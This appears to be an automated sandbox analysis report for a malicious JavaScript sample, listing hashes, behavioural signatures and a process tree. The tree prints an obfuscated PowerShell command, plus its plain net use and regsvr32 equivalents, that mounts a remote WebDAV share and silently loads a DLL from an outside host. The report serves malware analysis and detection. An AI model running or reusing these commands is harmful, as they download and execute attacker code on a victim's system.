Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
20/08/2024, 14:20
Static task
static1
Behavioral task
behavioral1
Sample
0394b4dab5a978c75c4cb6e44c85df9093506d4b80ffaa76c49cd9d049d80d6c.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
0394b4dab5a978c75c4cb6e44c85df9093506d4b80ffaa76c49cd9d049d80d6c.js
Resource
win10v2004-20240802-en
General
-
Target
0394b4dab5a978c75c4cb6e44c85df9093506d4b80ffaa76c49cd9d049d80d6c.js
-
Size
13KB
-
MD5
9bc4f73e7159cf45dfb20db78240c671
-
SHA1
8c3a77d8268755fcdace5fbc5544d890cf694e20
-
SHA256
0394b4dab5a978c75c4cb6e44c85df9093506d4b80ffaa76c49cd9d049d80d6c
-
SHA512
19b294158f52069dfc409b654376fb3337890c8354bb1b51b0c0ec0bb571762490e0b941c0900730ac3891c4f64e61ae12ef839278c2c4c2a90bea5f9da849d7
-
SSDEEP
96:j9PfCI9V4AAd4d8Eo7t43ZY8Xs903gtoIlykvXj1u6I0PCq903gtoIlykvXj1uKP:9f4I6M67
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2404 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2404 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2360 wrote to memory of 2404 2360 wscript.exe 30 PID 2360 wrote to memory of 2404 2360 wscript.exe 30 PID 2360 wrote to memory of 2404 2360 wscript.exe 30 PID 2404 wrote to memory of 2324 2404 powershell.exe 32 PID 2404 wrote to memory of 2324 2404 powershell.exe 32 PID 2404 wrote to memory of 2324 2404 powershell.exe 32 PID 2404 wrote to memory of 1020 2404 powershell.exe 34 PID 2404 wrote to memory of 1020 2404 powershell.exe 34 PID 2404 wrote to memory of 1020 2404 powershell.exe 34 PID 2404 wrote to memory of 1020 2404 powershell.exe 34 PID 2404 wrote to memory of 1020 2404 powershell.exe 34
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\0394b4dab5a978c75c4cb6e44c85df9093506d4b80ffaa76c49cd9d049d80d6c.js1⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADcANAA5ADUAMQA3ADYANwA1ADEAMAA4ADYAMAAuAGQAbABsAA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\3⤵PID:2324
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\74951767510860.dll3⤵PID:1020
-
-